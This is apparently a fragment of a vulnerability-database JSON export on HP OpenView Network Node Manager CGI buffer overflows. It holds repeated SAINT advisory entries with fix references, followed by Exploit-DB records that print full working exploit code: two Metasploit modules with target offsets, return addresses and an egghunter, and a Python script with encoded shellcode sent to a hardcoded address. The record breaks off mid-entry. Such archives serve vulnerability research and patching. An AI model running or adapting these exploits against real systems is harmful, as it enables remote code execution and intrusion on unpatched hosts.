[40071](<http://www.securityfocus.com/bid/40071>) \nOSVDB: [64976](<http://www.osvdb.org/64976>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability in Network Node Manager allows remote attackers to execute arbitrary commands by sending a request for the getnnmdata.exe CGI program with a specially crafted ICount parameter. 
\n\n### Resolution\n\nApply the fix referenced in [HPSBMA02527 SSRT010098](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-10-085/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\nOn Windows Server 2003, Read and Execute privileges on the file '%windir%\\system32\\cmd.exe' must be granted to the Internet Guest Account \"IUSR_<computername>\" for the exploit to work properly. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2010-08-23T00:00:00", "published": "2010-08-23T00:00:00", "id": "SAINT:E31B141E7568E9F6BD86756DDBEE0E76", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_getnnmdata_icount", "type": "saint", "title": "HP OpenView NNM getnnmdata.exe CGI ICount Parameter Buffer Overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:32", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1554"], "description": "Added: 08/23/2010 \nCVE: [CVE-2010-1554](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1554>) \nBID: [40071](<http://www.securityfocus.com/bid/40071>) \nOSVDB: [64976](<http://www.osvdb.org/64976>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability in Network Node Manager allows remote attackers to execute arbitrary commands by sending a request for the getnnmdata.exe CGI program with a specially crafted ICount parameter. \n\n### Resolution\n\nApply the fix referenced in [HPSBMA02527 SSRT010098](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-10-085/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. 
\n\nOn Windows Server 2003, Read and Execute privileges on the file '%windir%\\system32\\cmd.exe' must be granted to the Internet Guest Account \"IUSR_<computername>\" for the exploit to work properly. \n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2010-08-23T00:00:00", "published": "2010-08-23T00:00:00", "id": "SAINT:909E1C259F91E79DDA03959C79D8A151", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_getnnmdata_icount", "title": "HP OpenView NNM getnnmdata.exe CGI ICount Parameter Buffer Overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:53", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1553"], "description": "Added: 05/21/2010 \nCVE: [CVE-2010-1553](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1553>) \nBID: [40070](<http://www.securityfocus.com/bid/40070>) \nOSVDB: [64976](<http://www.osvdb.org/64976>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability in Network Node Manager allows remote attackers to execute arbitrary commands by sending a request for the getnnmdata.exe CGI program with a specially crafted MaxAge parameter. \n\n### Resolution\n\nApply the fix referenced in [HPSBMA02527 SSRT010098](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-10-084/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\nOn Windows Server 2003, Read and Execute privileges on the file '%windir%\\system32\\cmd.exe' must be granted to the Internet Guest Account \"IUSR_<computername>\" for the exploit to work properly. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2010-05-21T00:00:00", "published": "2010-05-21T00:00:00", "id": "SAINT:4C4E1B817EDCE1F9B13110CDFAC660A7", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_getnnmdata_maxage", "type": "saint", "title": "HP OpenView Network Node Manager getnnmdata.exe CGI MaxAge buffer overflow", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:49", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1553"], "edition": 2, "description": "Added: 05/21/2010 \nCVE: [CVE-2010-1553](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1553>) \nBID: [40070](<http://www.securityfocus.com/bid/40070>) \nOSVDB: [64976](<http://www.osvdb.org/64976>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability in Network Node Manager allows remote attackers to execute arbitrary commands by sending a request for the getnnmdata.exe CGI program with a specially crafted MaxAge parameter. \n\n### Resolution\n\nApply the fix referenced in [HPSBMA02527 SSRT010098](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-10-084/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\nOn Windows Server 2003, Read and Execute privileges on the file '%windir%\\system32\\cmd.exe' must be granted to the Internet Guest Account \"IUSR_<computername>\" for the exploit to work properly. 
\n\n### Platforms\n\nWindows \n \n\n", "modified": "2010-05-21T00:00:00", "published": "2010-05-21T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_getnnmdata_maxage", "id": "SAINT:377F10DCAC2F7BEEC4A4AF2B0BFCBA64", "title": "HP OpenView Network Node Manager getnnmdata.exe CGI MaxAge buffer overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:41", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1553"], "description": "Added: 05/21/2010 \nCVE: [CVE-2010-1553](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1553>) \nBID: [40070](<http://www.securityfocus.com/bid/40070>) \nOSVDB: [64976](<http://www.osvdb.org/64976>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA buffer overflow vulnerability in Network Node Manager allows remote attackers to execute arbitrary commands by sending a request for the getnnmdata.exe CGI program with a specially crafted MaxAge parameter. \n\n### Resolution\n\nApply the fix referenced in [HPSBMA02527 SSRT010098](<http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02153379>). \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-10-084/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\nOn Windows Server 2003, Read and Execute privileges on the file '%windir%\\system32\\cmd.exe' must be granted to the Internet Guest Account \"IUSR_<computername>\" for the exploit to work properly. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2010-05-21T00:00:00", "published": "2010-05-21T00:00:00", "id": "SAINT:E0B949A72CCB7BC89903D7F732FB87A1", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_getnnmdata_maxage", "title": "HP OpenView Network Node Manager getnnmdata.exe CGI MaxAge buffer overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:30", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1552"], "description": "Added: 07/01/2010 \nCVE: [CVE-2010-1552](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1552>) \nBID: [40068](<http://www.securityfocus.com/bid/40068>) \nOSVDB: [64975](<http://www.osvdb.org/64975>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA stack buffer overflow vulnerability in HP OpenView NNM allows remote attackers to execute arbitrary commands by sending specially crafted `**act**` and `**app**` parameters to the `**snmpviewer.exe**` CGI program. \n\n### Resolution\n\nApply the patches referenced in [HP Security Bulletin HPSBMA02527 SSRT010098](<http://marc.info/?l=bugtraq&m=127360750704351&w=2>). \n\n### References\n\n<http://secunia.com/advisories/39757/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\nOn Windows Server 2003, `**Read**` and `**Execute**` privileges on the file `**%windir%\\system32\\cmd.exe**` must be granted to the Internet Guest Account `**IUSR_<computername>**` for the exploit to work properly. Note that users in the groups `**Users**` and `**Power Users**` don't have those privileges, but users in the groups `**Administrators**` and `**TelnetClients**` do. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 4, "modified": "2010-07-01T00:00:00", "published": "2010-07-01T00:00:00", "id": "SAINT:5F3BAD5DD33554F68C6FA2D69E7F76D5", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_snmpviewer_cgi_doload", "title": "HP OpenView Network Node Manager snmpviewer.exe CGI Stack Buffer Overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:02:02", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1552"], "description": "Added: 07/01/2010 \nCVE: [CVE-2010-1552](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1552>) \nBID: [40068](<http://www.securityfocus.com/bid/40068>) \nOSVDB: [64975](<http://www.osvdb.org/64975>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA stack buffer overflow vulnerability in HP OpenView NNM allows remote attackers to execute arbitrary commands by sending specially crafted `**act**` and `**app**` parameters to the `**snmpviewer.exe**` CGI program. \n\n### Resolution\n\nApply the patches referenced in [HP Security Bulletin HPSBMA02527 SSRT010098](<http://marc.info/?l=bugtraq&m=127360750704351&w=2>). \n\n### References\n\n<http://secunia.com/advisories/39757/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\nOn Windows Server 2003, `**Read**` and `**Execute**` privileges on the file `**%windir%\\system32\\cmd.exe**` must be granted to the Internet Guest Account `**IUSR_<computername>**` for the exploit to work properly. Note that users in the groups `**Users**` and `**Power Users**` don't have those privileges, but users in the groups `**Administrators**` and `**TelnetClients**` do. 
\n\n### Platforms\n\nWindows \n \n\n", "edition": 1, "modified": "2010-07-01T00:00:00", "published": "2010-07-01T00:00:00", "id": "SAINT:4710FCDC0395F3FB13BA4B433FB43F99", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_snmpviewer_cgi_doload", "title": "HP OpenView Network Node Manager snmpviewer.exe CGI Stack Buffer Overflow", "type": "saint", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:49", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1552"], "edition": 2, "description": "Added: 07/01/2010 \nCVE: [CVE-2010-1552](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1552>) \nBID: [40068](<http://www.securityfocus.com/bid/40068>) \nOSVDB: [64975](<http://www.osvdb.org/64975>) \n\n\n### Background\n\n[HP OpenView Network Node Manager](<http://www.openview.hp.com/products/nnm/>) is network availability and performance management software. \n\n### Problem\n\nA stack buffer overflow vulnerability in HP OpenView NNM allows remote attackers to execute arbitrary commands by sending specially crafted `**act**` and `**app**` parameters to the `**snmpviewer.exe**` CGI program. \n\n### Resolution\n\nApply the patches referenced in [HP Security Bulletin HPSBMA02527 SSRT010098](<http://marc.info/?l=bugtraq&m=127360750704351&w=2>). \n\n### References\n\n<http://secunia.com/advisories/39757/> \n\n\n### Limitations\n\nExploit works on HP OpenView Network Node Manager 7.53. \n\nOn Windows Server 2003, `**Read**` and `**Execute**` privileges on the file `**%windir%\\system32\\cmd.exe**` must be granted to the Internet Guest Account `**IUSR_<computername>**` for the exploit to work properly. Note that users in the groups `**Users**` and `**Power Users**` don't have those privileges, but users in the groups `**Administrators**` and `**TelnetClients**` do. 
\n\n### Platforms\n\nWindows \n \n\n", "modified": "2010-07-01T00:00:00", "published": "2010-07-01T00:00:00", "id": "SAINT:CB238558CECE292042B771AEC6061FE4", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/openview_nnm_snmpviewer_cgi_doload", "type": "saint", "title": "HP OpenView Network Node Manager snmpviewer.exe CGI Stack Buffer Overflow", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "exploitdb": [{"lastseen": "2016-02-02T07:05:31", "description": "HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow. CVE-2010-1554. Remote exploit for windows platform", "published": "2011-03-24T00:00:00", "type": "exploitdb", "title": "HP OpenView Network Node Manager getnnmdata.exe ICount CGI Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1554"], "modified": "2011-03-24T00:00:00", "id": "EDB-ID:17040", "href": "https://www.exploit-db.com/exploits/17040/", "sourceData": "##\r\n# $Id: hp_nnm_getnnmdata_icount.rb 12121 2011-03-24 00:49:33Z swtornio $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tHttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ }\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'HP OpenView Network Node Manager getnnmdata.exe (ICount) CGI Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\r\n\t\t\t\tBy sending specially crafted ICount parameter to the getnnmdata.exe CGI,\r\n\t\t\t\tan attacker may be able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 12121 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-1554' ],\r\n\t\t\t\t\t[ 'OSVDB', '64976' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 750,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'PrependEncoder' => \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\",\r\n\t\t\t\t\t'DisableNops' => 'True',\r\n\t\t\t\t\t'EncoderType' => Msf::Encoder::Type::AlphanumUpper,\r\n\t\t\t\t\t'EncoderOptions' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'BufferRegister' => 'ECX',\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'HP OpenView Network Node Manager 7.50', { 'Offset' => 7582, 'Ret' => 0x5a01f277 } ], \r\n\t\t\t\t\t[ 'HP OpenView Network Node Manager 7.53', { 'Offset' => 2052, 'Ret' => 0x5a666d69 } 
],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'May 11 2010'))\r\n\r\n\t\tregister_options( [ Opt::RPORT(80) ], self.class )\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tegg = rand_text_alpha_upper(4)\r\n\r\n\t\thunter = \"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"\r\n\t\thunter << \"\\xef\\xb8\" + egg + \"\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\r\n\r\n\t\tboom = rand_text_alpha_upper(target['Offset'])\r\n\t\tboom << generate_seh_record(target.ret)\r\n\t\tboom << hunter + egg + egg\r\n\t\tboom << payload.encoded\r\n\t\tboom << rand_text_alpha_upper(9024 - payload.encoded.length)\r\n\t\t\r\n\t\tsploit = \"SnmpVals=&ICount=-9#{boom}\"\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tsend_request_cgi({\r\n\t\t\t'uri'\t\t=> '/OvCgi/getnnmdata.exe',\r\n\t\t\t'method'\t=> 'POST',\r\n\t\t\t'data'\t\t=> sploit\r\n\t\t\t}, 8)\r\n\r\n\t\thandler\r\n\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17040/"}, {"lastseen": "2016-02-01T19:17:44", "description": "HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution. CVE-2010-1554. 
Remote exploit for windows platform", "published": "2010-07-02T00:00:00", "type": "exploitdb", "title": "HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1554"], "modified": "2010-07-02T00:00:00", "id": "EDB-ID:14181", "href": "https://www.exploit-db.com/exploits/14181/", "sourceData": "# Exploit Title: HP OpenView NNM getnnmdata.exe CGI Invalid ICount Remote Code Execution \r\n# Date: 2010.07.02\r\n# Author: S2 Crew [Hungary]\r\n# Software Link: hp.com\r\n# Version: 7.53\r\n# Tested on: Windows 2003\r\n# CVE: CVE-2010-1554\r\n\r\n# Code :\r\n\r\n#!/usr/bin/python\r\n\r\nimport struct\r\nimport socket\r\nimport httplib\r\nimport urllib\r\n\r\n# calc.exe Windows Execute Command\r\nsc2 = (\r\n\"\\x89\\xe7\\xdb\\xc4\\xd9\\x77\\xf4\\x5a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\\x4a\"\r\n\"\\x4a\\x4a\\x4a\\x4a\\x43\\x43\\x43\\x43\\x43\\x43\\x37\\x52\\x59\\x6a\\x41\"\r\n\"\\x58\\x50\\x30\\x41\\x30\\x41\\x6b\\x41\\x41\\x51\\x32\\x41\\x42\\x32\\x42\"\r\n\"\\x42\\x30\\x42\\x42\\x41\\x42\\x58\\x50\\x38\\x41\\x42\\x75\\x4a\\x49\\x4b\"\r\n\"\\x4c\\x4a\\x48\\x4c\\x49\\x47\\x70\\x43\\x30\\x45\\x50\\x51\\x70\\x4f\\x79\"\r\n\"\\x4d\\x35\\x50\\x31\\x4b\\x62\\x43\\x54\\x4e\\x6b\\x51\\x42\\x46\\x50\\x4e\"\r\n\"\\x6b\\x50\\x52\\x46\\x6c\\x4e\\x6b\\x51\\x42\\x46\\x74\\x4c\\x4b\\x43\\x42\"\r\n\"\\x47\\x58\\x46\\x6f\\x4f\\x47\\x42\\x6a\\x46\\x46\\x44\\x71\\x4b\\x4f\\x44\"\r\n\"\\x71\\x4f\\x30\\x4e\\x4c\\x47\\x4c\\x51\\x71\\x51\\x6c\\x46\\x62\\x44\\x6c\"\r\n\"\\x45\\x70\\x4f\\x31\\x48\\x4f\\x44\\x4d\\x47\\x71\\x4a\\x67\\x4a\\x42\\x4c\"\r\n\"\\x30\\x43\\x62\\x46\\x37\\x4c\\x4b\\x50\\x52\\x44\\x50\\x4c\\x4b\\x42\\x62\"\r\n\"\\x45\\x6c\\x45\\x51\\x4e\\x30\\x4c\\x4b\\x47\\x30\\x50\\x78\\x4e\\x65\\x4b\"\r\n\"\\x70\\x43\\x44\\x43\\x7a\\x43\\x31\\x4a\\x70\\x46\\x30\\x4e\\x6b\\x51\\x58\"\r\n\"\\x42\\x38\\x4c\\x4b\\x46\\x38\\x47\\x50\\x43\\x31\\x4b\\x63\\x4b\\x53\\x47\"\r\n\"\\x4c\\x42\\x69\\x4c\\x4b\\x45\\x64\\x4c\\x4b\\x45\\x51\\x4a
\\x76\\x46\\x51\"\r\n\"\\x4b\\x4f\\x45\\x61\\x49\\x50\\x4c\\x6c\\x4a\\x61\\x48\\x4f\\x44\\x4d\\x45\"\r\n\"\\x51\\x4a\\x67\\x47\\x48\\x4b\\x50\\x44\\x35\\x4b\\x44\\x44\\x43\\x43\\x4d\"\r\n\"\\x4a\\x58\\x47\\x4b\\x43\\x4d\\x51\\x34\\x51\\x65\\x4d\\x32\\x42\\x78\\x4c\"\r\n\"\\x4b\\x43\\x68\\x47\\x54\\x47\\x71\\x4a\\x73\\x51\\x76\\x4c\\x4b\\x46\\x6c\"\r\n\"\\x50\\x4b\\x4e\\x6b\\x42\\x78\\x45\\x4c\\x45\\x51\\x49\\x43\\x4c\\x4b\\x47\"\r\n\"\\x74\\x4e\\x6b\\x47\\x71\\x4e\\x30\\x4d\\x59\\x47\\x34\\x46\\x44\\x44\\x64\"\r\n\"\\x51\\x4b\\x43\\x6b\\x50\\x61\\x42\\x79\\x42\\x7a\\x50\\x51\\x49\\x6f\\x49\"\r\n\"\\x70\\x43\\x68\\x51\\x4f\\x51\\x4a\\x4e\\x6b\\x45\\x42\\x4a\\x4b\\x4d\\x56\"\r\n\"\\x43\\x6d\\x50\\x6a\\x47\\x71\\x4c\\x4d\\x4c\\x45\\x4e\\x59\\x45\\x50\\x45\"\r\n\"\\x50\\x45\\x50\\x50\\x50\\x43\\x58\\x45\\x61\\x4e\\x6b\\x42\\x4f\\x4b\\x37\"\r\n\"\\x4b\\x4f\\x4a\\x75\\x4d\\x6b\\x4c\\x30\\x4c\\x75\\x49\\x32\\x42\\x76\\x50\"\r\n\"\\x68\\x4d\\x76\\x4a\\x35\\x4f\\x4d\\x4f\\x6d\\x4b\\x4f\\x49\\x45\\x47\\x4c\"\r\n\"\\x43\\x36\\x51\\x6c\\x45\\x5a\\x4b\\x30\\x49\\x6b\\x4b\\x50\\x43\\x45\\x45\"\r\n\"\\x55\\x4d\\x6b\\x42\\x67\\x47\\x63\\x51\\x62\\x42\\x4f\\x50\\x6a\\x45\\x50\"\r\n\"\\x51\\x43\\x4b\\x4f\\x4b\\x65\\x45\\x33\\x43\\x51\\x50\\x6c\\x45\\x33\\x46\"\r\n\"\\x4e\\x43\\x55\\x51\\x68\\x50\\x65\\x43\\x30\\x45\\x5a\\x41\\x41\"\r\n)\r\n\r\negghunter = (\r\n\"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\"\r\n\"\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"\r\n\"\\xef\\xb8\\x54\\x30\\x30\\x57\\x8b\\xfa\"\r\n\"\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\r\n)\r\n\r\nret = struct.pack('<L',0x5A667A77) # ppr\r\njmp1 = '\\xeb\\xf9\\x90\\x90'\r\njmp2 = '\\xeb\\xdd\\x90\\x90\\x90'\r\n\r\np = 'Topo=X&SnmpVals=X&Hostname=X&ICount='+'9'*100+'A'*1917+egghunter+jmp2+jmp1 + ret + \"C\"*500\r\n\r\nh = {\"Content-Type\": \"application/x-www-form-urlencoded\",\"Host\":\"172.16.29.149\",\"User-Agent\":\"T00WT00W\"+sc2}\r\n\r\nc = 
httplib.HTTPConnection('172.16.29.149')\r\nc.request(\"POST\",\"/OvCgi/getnnmdata.exe\",p,h)\r\nr = c.getresponse()\r\n\r\nprint r.status, r.reason\r\ndata = r.read()\r\nprint data\r\nc.close()\r\n\r\nprint \"\\nDone\\n\" \r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/14181/"}, {"lastseen": "2016-02-02T07:05:47", "description": "HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow. CVE-2010-1553. Remote exploit for windows platform", "published": "2011-03-24T00:00:00", "type": "exploitdb", "title": "HP OpenView Network Node Manager getnnmdata.exe MaxAge CGI Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1553"], "modified": "2011-03-24T00:00:00", "id": "EDB-ID:17042", "href": "https://www.exploit-db.com/exploits/17042/", "sourceData": "##\r\n# $Id: hp_nnm_getnnmdata_maxage.rb 12121 2011-03-24 00:49:33Z swtornio $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. 
Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking\r\n\r\n\tHttpFingerPrint = { :method => 'HEAD', :uri => '/OvCgi/getnnmdata.exe', :pattern => /Hewlett-Packard Development Company/ }\r\n\r\n\tinclude Msf::Exploit::Remote::HttpClient\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'HP OpenView Network Node Manager getnnmdata.exe (MaxAge) CGI Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a buffer overflow in HP OpenView Network Node Manager 7.50/7.53.\r\n\t\t\t\tBy sending specially crafted MaxAge parameter to the getnnmdata.exe CGI,\r\n\t\t\t\tan attacker may be able to execute arbitrary code.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'MC' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 12121 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-1553' ],\r\n\t\t\t\t\t[ 'OSVDB', '64976' ],\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t},\r\n\t\t\t'Privileged' => false,\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 750,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'PrependEncoder' => \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\",\r\n\t\t\t\t\t'DisableNops' => 'True',\r\n\t\t\t\t\t'EncoderType' => Msf::Encoder::Type::AlphanumUpper,\r\n\t\t\t\t\t'EncoderOptions' =>\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t'BufferRegister' => 'ECX',\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'HP OpenView Network Node Manager 7.50', { 'Offset' => 7591, 'Ret' => 0x5a01f277 } ],\r\n\t\t\t\t\t[ 'HP OpenView Network Node Manager 7.53', { 'Offset' => 2054, 'Ret' => 0x5a666d69 } 
],\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'May 11 2010'))\r\n\r\n\t\tregister_options( [ Opt::RPORT(80) ], self.class )\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tegg = rand_text_alpha_upper(4)\r\n\r\n\t\thunter = \"\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74\"\r\n\t\thunter << \"\\xef\\xb8\" + egg + \"\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7\"\r\n\r\n\t\tboom = rand_text_alpha_upper(target['Offset'])\r\n\t\tboom << generate_seh_record(target.ret)\r\n\t\tboom << hunter + egg + egg\r\n\t\tboom << payload.encoded\r\n\t\tboom << rand_text_alpha_upper(9024 - payload.encoded.length)\r\n\t\r\n\t\tsploit = \"SnmpVals=&MaxAge=#{boom}\"\r\n\r\n\t\tprint_status(\"Trying target #{target.name}...\")\r\n\r\n\t\tsend_request_cgi({\r\n\t\t\t'uri'\t\t=> '/OvCgi/getnnmdata.exe',\r\n\t\t\t'method'\t=> 'POST',\r\n\t\t\t'data'\t\t=> sploit\r\n\t\t\t}, 8)\r\n\r\n\t\thandler\r\n\t\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/17042/"}, {"lastseen": "2016-02-01T19:17:31", "description": "HP OpenView NNM getnnmdata.exe CGI Invalid MaxAge Remote Code Execution. CVE-2010-1553. 
